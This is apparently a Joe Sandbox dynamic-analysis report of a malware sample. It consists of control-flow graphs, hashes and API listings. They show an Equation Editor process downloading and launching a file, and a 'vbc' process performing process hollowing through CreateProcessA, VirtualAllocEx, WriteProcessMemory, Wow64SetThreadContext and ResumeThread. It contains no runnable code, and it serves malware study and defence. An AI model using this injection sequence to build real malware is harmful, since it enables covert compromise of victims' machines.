                                              control_flow_graph 274 36902f1-3690318 ExitProcess call 369030a 277 369036b-3690387 274->277 278 369031b 274->278 282 3690388-369038a 277->282 279 369031d-3690320 278->279 280 369038c-3690394 278->280 279->282 283 3690323 279->283 284 3690398-36903a5 call 36903b0 280->284 282->280 283->284 285 3690325-3690334 call 369034d 283->285 291 36903a6-369044c call 3690401 URLDownloadToFileW call 369044b 284->291 285->291 292 3690336-369033b 285->292 305 3690452-3690458 291->305 306 369044d call 3690462 291->306 292->291 293 369033d-3690343 292->293 293->284 297 3690345-3690368 call 3690381 293->297 297->277 307 369045a-369045f 305->307 308 36904bf-36904c3 305->308 306->305 312 36904b8 307->312 313 3690461-3690477 ShellExecuteExW call 3690480 307->313 310 36904ee-36904f7 308->310 311 36904c5-36904c6 308->311 316 36904bb-36904be 310->316 314 36904c9 311->314 312->316 313->314 328 3690479 313->328 318 36904cb-36904cf 314->318 319 36904d1-36904d5 314->319 316->308 317 36904f9 316->317 325 36904fc-36904fd 317->325 318->319 321 36904dd-36904e4 318->321 322 36904ea-36904ec 319->322 323 36904d7-36904db 319->323 326 36904e8 321->326 327 36904e6 321->327 322->325 323->321 323->322 326->310 326->322 327->322 328->322 329 369047b-3690485 ExitProcess 328->329
                                              APIs
                                              • ExitProcess.KERNEL32(036902DF), ref: 036902F1
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.970273455.0000000003690000.00000004.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_3690000_EQNEDT32.jbxd
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID:
                                              • API String ID: 621844428-0
                                              • Opcode ID: b49a11a0d75daec86fa9951426c73f9ce6ab899376186c9bd45f0c1f6fc16a65
                                              • Instruction ID: 7adf7f11e0b7ec40fbc0cf7ae31c824ff0d7e0754c65974e48297189663a29f1
                                              • Opcode Fuzzy Hash: b49a11a0d75daec86fa9951426c73f9ce6ab899376186c9bd45f0c1f6fc16a65
                                              • Instruction Fuzzy Hash: 4611045680E7C29FEF02E7701E6A145FF28BA1750075C86DFC4C48E2A3D625964AD397
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Execution Graph

                                              Execution Coverage:15.9%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:98
                                              Total number of Limit Nodes:15
                                              execution_graph 10825 68c758 10826 68c7a4 ReadProcessMemory 10825->10826 10828 68c822 10826->10828 10829 d56c28 10830 d56c3d 10829->10830 10834 d56c70 10830->10834 10838 d56c60 10830->10838 10831 d56c53 10835 d56c8a 10834->10835 10842 d57230 10835->10842 10839 d56c8a 10838->10839 10841 d57230 5 API calls 10839->10841 10840 d56cd8 10840->10831 10841->10840 10843 d57255 10842->10843 10861 d576fe 10843->10861 10865 d57992 10843->10865 10869 d574f2 10843->10869 10876 d57417 10843->10876 10880 d5764a 10843->10880 10884 d5778b 10843->10884 10888 d57288 10843->10888 10892 d574ce 10843->10892 10896 d5750d 10843->10896 10900 d57582 10843->10900 10905 d57600 10843->10905 10909 d57684 10843->10909 10913 d5789b 10843->10913 10917 d5783b 10843->10917 10922 d577f8 10843->10922 10926 d57278 10843->10926 10844 d56cd8 10844->10831 10862 d5770b 10861->10862 10930 d58a60 10862->10930 10866 d572f4 10865->10866 10867 d584b0 10866->10867 10938 68c9f0 10866->10938 10867->10844 10870 d57711 10869->10870 10873 d572f4 10869->10873 10942 d58a18 10870->10942 10872 d584b0 10872->10844 10873->10872 10874 68c9f0 CreateProcessA 10873->10874 10874->10873 10878 d572f4 10876->10878 10877 d584b0 10877->10844 10878->10877 10879 68c9f0 CreateProcessA 10878->10879 10879->10878 10882 d572f4 10880->10882 10881 d584b0 10881->10844 10882->10881 10883 68c9f0 CreateProcessA 10882->10883 10883->10882 10886 d572f4 10884->10886 10885 d584b0 10885->10844 10886->10885 10887 68c9f0 CreateProcessA 10886->10887 10887->10886 10889 d572bb 10888->10889 10890 d584b0 10889->10890 10891 68c9f0 CreateProcessA 10889->10891 10890->10844 10891->10889 10893 d572f4 10892->10893 10894 d584b0 10893->10894 10895 68c9f0 CreateProcessA 10893->10895 10894->10844 10895->10893 10898 d572f4 10896->10898 10897 d584b0 10897->10844 10898->10897 10899 68c9f0 CreateProcessA 10898->10899 10899->10898 10950 68c5c8 10900->10950 10901 d584b0 10901->10844 10902 d572f4 10902->10901 10903 68c9f0 CreateProcessA 10902->10903 10903->10902 10907 d572f4 10905->10907 10906 d584b0 10906->10844 10907->10906 10908 68c9f0 CreateProcessA 10907->10908 10908->10907 10910 d572f4 10909->10910 10911 d584b0 10910->10911 10912 68c9f0 CreateProcessA 10910->10912 10911->10844 10912->10910 10915 d572f4 10913->10915 10914 d584b0 10914->10844 10915->10914 10916 68c9f0 CreateProcessA 10915->10916 10916->10915 10954 d58810 10917->10954 10918 d57894 10918->10844 10919 d572f4 10919->10918 10921 68c9f0 CreateProcessA 10919->10921 10921->10919 10924 d572f4 10922->10924 10923 d584b0 10923->10844 10924->10923 10925 68c9f0 CreateProcessA 10924->10925 10925->10924 10928 d572bb 10926->10928 10927 d584b0 10927->10844 10928->10927 10929 68c9f0 CreateProcessA 10928->10929 10929->10928 10931 d58a75 10930->10931 10934 68c160 10931->10934 10935 68c1a4 ResumeThread 10934->10935 10937 68c1f6 10935->10937 10939 68ca77 CreateProcessA 10938->10939 10941 68ccd5 10939->10941 10943 d58a2d 10942->10943 10946 68c280 10943->10946 10947 68c2c9 Wow64SetThreadContext 10946->10947 10949 68c347 10947->10949 10951 68c614 WriteProcessMemory 10950->10951 10953 68c6b3 10951->10953 10953->10902 10955 d58825 10954->10955 10958 68c470 10955->10958 10959 68c4b4 VirtualAllocEx 10958->10959 10961 68c532 10959->10961 10961->10919

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 2e0224-2e10aa 3 2e10ac 0->3 4 2e10b1-2e3695 0->4 3->4 465 2e369b-2e4bc5 4->465 623 2e4bcc-2ebf61 465->623 1621 2ebf8b 623->1621 1622 2ebf63-2ebf6f 623->1622 1625 2ebf91-2ec33e 1621->1625 1623 2ebf79-2ebf7f 1622->1623 1624 2ebf71-2ebf77 1622->1624 1626 2ebf89 1623->1626 1624->1626 1660 2ec345-2ec352 1625->1660 1626->1625 1661 2ec35e-2ec8bd 1660->1661 1709 2ec8bf-2ec8cb 1661->1709 1710 2ec8e7 1661->1710 1711 2ec8cd-2ec8d3 1709->1711 1712 2ec8d5-2ec8db 1709->1712 1713 2ec8ed-2ec8ff 1710->1713 1714 2ec8e5 1711->1714 1712->1714 1715 2ec906-2ecb6b 1713->1715 1714->1713 1734 2ecb6d-2ecb79 1715->1734 1735 2ecb95 1715->1735 1736 2ecb7b-2ecb81 1734->1736 1737 2ecb83-2ecb89 1734->1737 1738 2ecb9b-2ece19 1735->1738 1739 2ecb93 1736->1739 1737->1739 1759 2ece1b-2ece27 1738->1759 1760 2ece43 1738->1760 1739->1738 1762 2ece29-2ece2f 1759->1762 1763 2ece31-2ece37 1759->1763 1761 2ece49-2ed5ad 1760->1761 1830 2ed5b4-2ed5c1 1761->1830 1764 2ece41 1762->1764 1763->1764 1764->1761 1831 2ed5c8-2ed693 1830->1831 1841 2ed69a-2ed6a7 1831->1841 1842 2ed6ae-2ed776 1841->1842 1852 2ed77d-2ed78a 1842->1852 1853 2ed791-2ed7a0 1852->1853 1854 2ed7a7-2ed7b6 1853->1854 1855 2ed7bd-2ed7e0 1854->1855 1858 2ed7eb-2ed800 call 2ed9c8 1855->1858
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.996768196.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b00777fbd25aa83fcaace85cf101bc6ca8676ab07aab55487226028e5529ae28
                                              • Instruction ID: 68647595e17b5d53d31490adf25d5cb6085d3187549f913379cc6808f0455ef6
                                              • Opcode Fuzzy Hash: b00777fbd25aa83fcaace85cf101bc6ca8676ab07aab55487226028e5529ae28
                                              • Instruction Fuzzy Hash: D044C734A012198FD724EF34C994AE9B3B1FF8A304F5195EAD8096B761DB35AE81CF41
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1861 6843d0-6843f1 1862 6843f8-6844ec 1861->1862 1863 6843f3 1861->1863 1865 6844f2-684649 1862->1865 1866 684bf4-684c1c 1862->1866 1863->1862 1910 68464f-6846aa 1865->1910 1911 684bc2-684bf1 1865->1911 1869 685305-68530e 1866->1869 1871 684c2a-684c33 1869->1871 1872 685314-68532b 1869->1872 1873 684c3a-684d2e 1871->1873 1874 684c35 1871->1874 1893 684d58 1873->1893 1894 684d30-684d3c 1873->1894 1874->1873 1897 684d5e-684d7e 1893->1897 1895 684d3e-684d44 1894->1895 1896 684d46-684d4c 1894->1896 1898 684d56 1895->1898 1896->1898 1902 684dde-684e58 1897->1902 1903 684d80-684dd9 1897->1903 1898->1897 1921 684e5a-684ead 1902->1921 1922 684eaf-684ef2 1902->1922 1916 685302 1903->1916 1919 6846ac 1910->1919 1920 6846af-6846ba 1910->1920 1911->1866 1916->1869 1919->1920 1923 684ad4-684ada 1920->1923 1945 684efd-684f03 1921->1945 1922->1945 1925 6846bf-6846dd 1923->1925 1926 684ae0-684b5d 1923->1926 1929 6846df-6846e3 1925->1929 1930 684734-684749 1925->1930 1968 684bac-684bb2 1926->1968 1929->1930 1934 6846e5-6846f0 1929->1934 1932 68474b 1930->1932 1933 684750-684766 1930->1933 1932->1933 1936 684768 1933->1936 1937 68476d-684784 1933->1937 1939 684726-68472c 1934->1939 1936->1937 1943 68478b-6847a1 1937->1943 1944 684786 1937->1944 1941 68472e-68472f 1939->1941 1942 6846f2-6846f6 1939->1942 1946 6847b2-6849d8 1941->1946 1947 6846f8 1942->1947 1948 6846fc-684714 1942->1948 1950 6847a8-6847af 1943->1950 1951 6847a3 1943->1951 1944->1943 1955 684f5a-684f66 1945->1955 1959 6849da-6849de 1946->1959 1960 684a3c-684a51 1946->1960 1947->1948 1952 68471b-684723 1948->1952 1953 684716 1948->1953 1950->1946 1951->1950 1952->1939 1953->1952 1957 684f68-684ff0 1955->1957 1958 684f05-684f27 1955->1958 1992 685175-68517e 1957->1992 1962 684f29 1958->1962 1963 684f2e-684f57 1958->1963 1959->1960 1967 6849e0-6849ef 1959->1967 1964 684a58-684a79 1960->1964 1965 684a53 1960->1965 1962->1963 1963->1955 1969 684a7b 1964->1969 1970 684a80-684a9f 1964->1970 1965->1964 1971 684a2e-684a34 1967->1971 1973 684b5f-684ba9 1968->1973 1974 684bb4-684bba 1968->1974 1969->1970 1976 684aa1 1970->1976 1977 684aa6-684ac6 1970->1977 1978 6849f1-6849f5 1971->1978 1979 684a36-684a37 1971->1979 1973->1968 1974->1911 1976->1977 1982 684ac8 1977->1982 1983 684acd 1977->1983 1980 6849ff-684a20 1978->1980 1981 6849f7-6849fb 1978->1981 1986 684ad1 1979->1986 1988 684a22 1980->1988 1989 684a27-684a2b 1980->1989 1981->1980 1982->1983 1983->1986 1986->1923 1988->1989 1989->1971 1994 685184-6851df 1992->1994 1995 684ff5-68500a 1992->1995 2010 6851e1-685214 1994->2010 2011 685216-685240 1994->2011 1996 68500c 1995->1996 1997 685013-685169 1995->1997 1996->1997 1999 6850e8-685128 1996->1999 2000 685019-685059 1996->2000 2001 68505e-68509e 1996->2001 2002 6850a3-6850e3 1996->2002 2012 68516f 1997->2012 1999->2012 2000->2012 2001->2012 2002->2012 2019 685249-6852dc 2010->2019 2011->2019 2012->1992 2023 6852e3-6852fb 2019->2023 2023->1916
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997698805.0000000000680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_680000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4Oi$4Oi$4Ui$UUUU
                                              • API String ID: 0-2271536380
                                              • Opcode ID: 59eaa8db0e01545a6b664ef2ee5c287d19ebdd7a83252cf0f0652886f2b62095
                                              • Instruction ID: 12120975d7a4674c425ceb4ae1b9ac4d4c3c3f4a0fb1b5d8d6348e5bdf018048
                                              • Opcode Fuzzy Hash: 59eaa8db0e01545a6b664ef2ee5c287d19ebdd7a83252cf0f0652886f2b62095
                                              • Instruction Fuzzy Hash: 68A2B475A00628CFDB64DF69C984AD9BBB2FF89304F1581E9D509AB325DB319E81CF40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2024 683f29-683f5d 2026 683fc8-684233 2024->2026 2027 683f5f-683f70 2024->2027 2028 683f72 2027->2028 2029 683f77 2027->2029 2028->2029 2031 683f81-683f87 2029->2031 2034 683f8f-683f93 2031->2034
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997698805.0000000000680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_680000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4Oi$p_i$p}i
                                              • API String ID: 0-1102413639
                                              • Opcode ID: ff4369ec94c887fe5a6be8806ae907ca7ba13dc864fedff88106520b7e0490fc
                                              • Instruction ID: b1a8ba0791c825cefe007b42dc9be6899db5ea1ca9da42b38481106cc1f7293c
                                              • Opcode Fuzzy Hash: ff4369ec94c887fe5a6be8806ae907ca7ba13dc864fedff88106520b7e0490fc
                                              • Instruction Fuzzy Hash: 7271AE709046889FD719EF76E945A9EBBF3AFD5304F10C53AD108AB22AEF341985CB40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.996768196.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 405689dc52d148491542d48476ded8b3ea62310b331041ab9b27a8e59f6ae557
                                              • Instruction ID: a887f56da0cb6bf323e55519208df501e12d9697128d762798cdc8a6b4c141a1
                                              • Opcode Fuzzy Hash: 405689dc52d148491542d48476ded8b3ea62310b331041ab9b27a8e59f6ae557
                                              • Instruction Fuzzy Hash: 8382F971C552A9CEEF28CF97C8483EDFAF5BB88305F5480A9D009A6291D7790AD9DF10
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.996768196.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e5928a04b29c7ae2d53254172c40854f242bd56d9a0d4ec81d19853afb972b43
                                              • Instruction ID: b156e37e37da1bacf7464e382ad2d7fdd6e5b23bed2cea0e97dfbe2e4da80a97
                                              • Opcode Fuzzy Hash: e5928a04b29c7ae2d53254172c40854f242bd56d9a0d4ec81d19853afb972b43
                                              • Instruction Fuzzy Hash: D4220A71C552A9CFEF28CF97C9183EDBAF5BB84305F5480E9C109AA291D7790A88DF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997698805.0000000000680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_680000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8314e7a8ec4b3898de37bdff38244aece7714214f2093e021b46a437a6e4a390
                                              • Instruction ID: f6e48b40d3bd3256e06c86b63bae789d2c9358f22e12058c8f83c76889053115
                                              • Opcode Fuzzy Hash: 8314e7a8ec4b3898de37bdff38244aece7714214f2093e021b46a437a6e4a390
                                              • Instruction Fuzzy Hash: FF511474E05218DFDB04EFA9D8546EDBBF6BB8A300F209229E009B7395DB355942CF15
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2063 d57288-d572b9 2064 d572c0-d572f2 2063->2064 2065 d572bb 2063->2065 2066 d572f4-d572fa 2064->2066 2065->2064 2067 d57300-d57309 2066->2067 2068 d57312-d57313 2067->2068 2069 d5730b 2067->2069 2070 d57315-d57316 2068->2070 2069->2068 2069->2070 2071 d57475-d574a6 call 68c9f0 2069->2071 2072 d57318-d57329 2070->2072 2073 d574a8-d574cc 2071->2073 2072->2067 2074 d574da-d574e3 2073->2074 2075 d574e5 2074->2075 2076 d574ec-d57c90 2074->2076 2075->2072 2075->2076 2077 d5745c-d5745d 2075->2077 2078 d5745f-d57470 2075->2078 2079 d5732b-d573f8 2075->2079 2076->2074 2085 d584b0-d584b7 2077->2085 2086 d5742a-d57450 2077->2086 2078->2067 2079->2067 2097 d573fe-d573ff 2079->2097 2086->2067 2091 d57456-d57457 2086->2091 2091->2066 2097->2066
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_d50000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ($)
                                              • API String ID: 0-2051389312
                                              • Opcode ID: d0dc86122a7b0ed31c0f7e50b7c633cd4f050972b960d68fe691d2e7189dff98
                                              • Instruction ID: e8509832e1f76289cac719a514970b06a9fea0788388d872820dbcef9640eb14
                                              • Opcode Fuzzy Hash: d0dc86122a7b0ed31c0f7e50b7c633cd4f050972b960d68fe691d2e7189dff98
                                              • Instruction Fuzzy Hash: 20615870D08228CFDB64DF65D844BEDB7B6AB49311F2080EAD90DA7250DB745AC8DF60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2135 d5789b-d57944 2139 d574da-d574e3 2135->2139 2140 d5794a-d57955 2135->2140 2141 d574e5 2139->2141 2142 d574ec-d57c90 2139->2142 2140->2139 2141->2142 2143 d5745c-d5745d 2141->2143 2144 d5745f-d57470 2141->2144 2145 d57318-d57329 2141->2145 2146 d5732b-d573f8 2141->2146 2142->2139 2157 d584b0-d584b7 2143->2157 2158 d5742a-d57450 2143->2158 2148 d57300-d57309 2144->2148 2145->2148 2146->2148 2171 d573fe-d573ff 2146->2171 2150 d57312-d57313 2148->2150 2151 d5730b 2148->2151 2155 d57315-d57316 2150->2155 2151->2150 2151->2155 2156 d57475-d574a6 call 68c9f0 2151->2156 2155->2145 2161 d574a8-d574cc 2156->2161 2158->2148 2164 d57456-d57457 2158->2164 2161->2139 2166 d572f4-d572fa 2164->2166 2166->2148 2171->2166
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_d50000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ($)
                                              • API String ID: 0-2051389312
                                              • Opcode ID: f19f9d1d2e47edc710b056687ede4130473a001f2ea40002f34451a83bff89ae
                                              • Instruction ID: 680c41743d6dc5029f8bdc70cc2686aa9586e8525a87970467256c24ae00f035
                                              • Opcode Fuzzy Hash: f19f9d1d2e47edc710b056687ede4130473a001f2ea40002f34451a83bff89ae
                                              • Instruction Fuzzy Hash: DE510574904229CFDB64DF14D885BE8BBB1BB19311F2080EAD95DA3290E7749EC8DF60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2099 d57582-d575cd call 68c5c8 2101 d574da-d574e3 2099->2101 2102 d574e5 2101->2102 2103 d574ec-d57c90 2101->2103 2102->2103 2104 d5745c-d5745d 2102->2104 2105 d5745f-d57470 2102->2105 2106 d57318-d57329 2102->2106 2107 d5732b-d573f8 2102->2107 2103->2101 2118 d584b0-d584b7 2104->2118 2119 d5742a-d57450 2104->2119 2109 d57300-d57309 2105->2109 2106->2109 2107->2109 2132 d573fe-d573ff 2107->2132 2111 d57312-d57313 2109->2111 2112 d5730b 2109->2112 2116 d57315-d57316 2111->2116 2112->2111 2112->2116 2117 d57475-d574a6 call 68c9f0 2112->2117 2116->2106 2122 d574a8-d574cc 2117->2122 2119->2109 2125 d57456-d57457 2119->2125 2122->2101 2127 d572f4-d572fa 2125->2127 2127->2109 2132->2127
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_d50000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: )$.
                                              • API String ID: 0-3856877588
                                              • Opcode ID: 4581685454fa8e2ef8b1a48190ce0c2801658be959ce6bc44eeda4e47a96a088
                                              • Instruction ID: 242d4c5eb595b7369ebc645935f5a9937c8e6068b8b71dff512f303d42cb8cc1
                                              • Opcode Fuzzy Hash: 4581685454fa8e2ef8b1a48190ce0c2801658be959ce6bc44eeda4e47a96a088
                                              • Instruction Fuzzy Hash: 93511574908228CFDB64DF54D884BE8BBB1EB19311F2080EAD95DA7291D7749EC8DF60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2173 d5783b-d5788e call d58810 2176 d57894 2173->2176 2177 d574da-d574e3 2173->2177 2178 d574e5 2177->2178 2179 d574ec-d57c90 2177->2179 2178->2179 2180 d5745c-d5745d 2178->2180 2181 d5745f-d57470 2178->2181 2182 d57318-d57329 2178->2182 2183 d5732b-d573f8 2178->2183 2179->2177 2194 d584b0-d584b7 2180->2194 2195 d5742a-d57450 2180->2195 2185 d57300-d57309 2181->2185 2182->2185 2183->2185 2208 d573fe-d573ff 2183->2208 2187 d57312-d57313 2185->2187 2188 d5730b 2185->2188 2192 d57315-d57316 2187->2192 2188->2187 2188->2192 2193 d57475-d574a6 call 68c9f0 2188->2193 2192->2182 2198 d574a8-d574cc 2193->2198 2195->2185 2201 d57456-d57457 2195->2201 2198->2177 2203 d572f4-d572fa 2201->2203 2203->2185 2208->2203
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_d50000_vbc.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: !$)
                                              • API String ID: 0-1972669455
                                              • Opcode ID: 3a7d13c932112188dc39398961c76e17054b11e24733e3231929614f33be338a
                                              • Instruction ID: a73507344093848dac929740b27f50726cb3a5174b81b145130531ba3e539d3b
                                              • Opcode Fuzzy Hash: 3a7d13c932112188dc39398961c76e17054b11e24733e3231929614f33be338a
                                              • Instruction Fuzzy Hash: 7D510574904229CFDB64DF54D884BECBBB5AB19311F2080EAD91DA7290EB745AC8DF60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2211 68c9f0-68ca89 2213 68ca8b-68caa2 2211->2213 2214 68cad2-68cafa 2211->2214 2213->2214 2217 68caa4-68caa9 2213->2217 2218 68cafc-68cb10 2214->2218 2219 68cb40-68cb96 2214->2219 2220 68caab-68cab5 2217->2220 2221 68cacc-68cacf 2217->2221 2218->2219 2229 68cb12-68cb17 2218->2229 2227 68cb98-68cbac 2219->2227 2228 68cbdc-68ccd3 CreateProcessA 2219->2228 2222 68cab9-68cac8 2220->2222 2223 68cab7 2220->2223 2221->2214 2222->2222 2226 68caca 2222->2226 2223->2222 2226->2221 2227->2228 2237 68cbae-68cbb3 2227->2237 2247 68ccdc-68cdc1 2228->2247 2248 68ccd5-68ccdb 2228->2248 2230 68cb19-68cb23 2229->2230 2231 68cb3a-68cb3d 2229->2231 2232 68cb25 2230->2232 2233 68cb27-68cb36 2230->2233 2231->2219 2232->2233 2233->2233 2236 68cb38 2233->2236 2236->2231 2239 68cbb5-68cbbf 2237->2239 2240 68cbd6-68cbd9 2237->2240 2241 68cbc1 2239->2241 2242 68cbc3-68cbd2 2239->2242 2240->2228 2241->2242 2242->2242 2244 68cbd4 2242->2244 2244->2240 2260 68cdd1-68cdd5 2247->2260 2261 68cdc3-68cdc7 2247->2261 2248->2247 2263 68cde5-68cde9 2260->2263 2264 68cdd7-68cddb 2260->2264 2261->2260 2262 68cdc9 2261->2262 2262->2260 2266 68cdf9-68cdfd 2263->2266 2267 68cdeb-68cdef 2263->2267 2264->2263 2265 68cddd 2264->2265 2265->2263 2269 68cdff-68ce28 2266->2269 2270 68ce33-68ce3e 2266->2270 2267->2266 2268 68cdf1 2267->2268 2268->2266 2269->2270
                                              APIs
                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0068CCB7
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997698805.0000000000680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_680000_vbc.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: e2ec2a410564e3bb7b4cd59d603a854593a9b78f182826b18ea70abcf998f66b
                                              • Instruction ID: 2680ec4228cea9cb5831fcc1e3262c124b58e7283d459c7d0b48e7f55886af60
                                              • Opcode Fuzzy Hash: e2ec2a410564e3bb7b4cd59d603a854593a9b78f182826b18ea70abcf998f66b
                                              • Instruction Fuzzy Hash: 34C12370D0026D8FDB20DFA4C841BEDBBB2BF49314F0096A9D909B7240EB749A85CF95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2274 68c5c8-68c633 2276 68c64a-68c6b1 WriteProcessMemory 2274->2276 2277 68c635-68c647 2274->2277 2279 68c6ba-68c70c 2276->2279 2280 68c6b3-68c6b9 2276->2280 2277->2276 2280->2279
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0068C69B
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997698805.0000000000680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_680000_vbc.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: 9cba30a9f808aad9ea1a5d4b6962b59b3941c9d7f89bf1e7ee93acd8e9032676
                                              • Instruction ID: b80c7fad74f5a441463a5d43d1516d2d1c30671a0c4790fd90ab0101934d13f7
                                              • Opcode Fuzzy Hash: 9cba30a9f808aad9ea1a5d4b6962b59b3941c9d7f89bf1e7ee93acd8e9032676
                                              • Instruction Fuzzy Hash: 574198B5D012589FCF00CFA9D984AEEFBB1BF49314F20942AE815B7240D779AA45CF64
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2285 68c758-68c820 ReadProcessMemory 2288 68c829-68c87b 2285->2288 2289 68c822-68c828 2285->2289 2289->2288
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0068C80A
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997698805.0000000000680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_680000_vbc.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: 971a663dbf313f286e6d5fcf2e1a06f1658585b85606cbce175bcf550f766933
                                              • Instruction ID: bc8284a110e50a39256ef68e9e2f49ed36d23b1b9f0301e982e4ff1b2ceeb0ab
                                              • Opcode Fuzzy Hash: 971a663dbf313f286e6d5fcf2e1a06f1658585b85606cbce175bcf550f766933
                                              • Instruction Fuzzy Hash: 3241B9B4D042589FCF00CFA9D884AEEFBB1BF49314F10942AE915B7200D775A946CFA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2294 68c470-68c530 VirtualAllocEx 2297 68c539-68c583 2294->2297 2298 68c532-68c538 2294->2298 2298->2297
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0068C51A
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.997698805.0000000000680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_680000_vbc.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
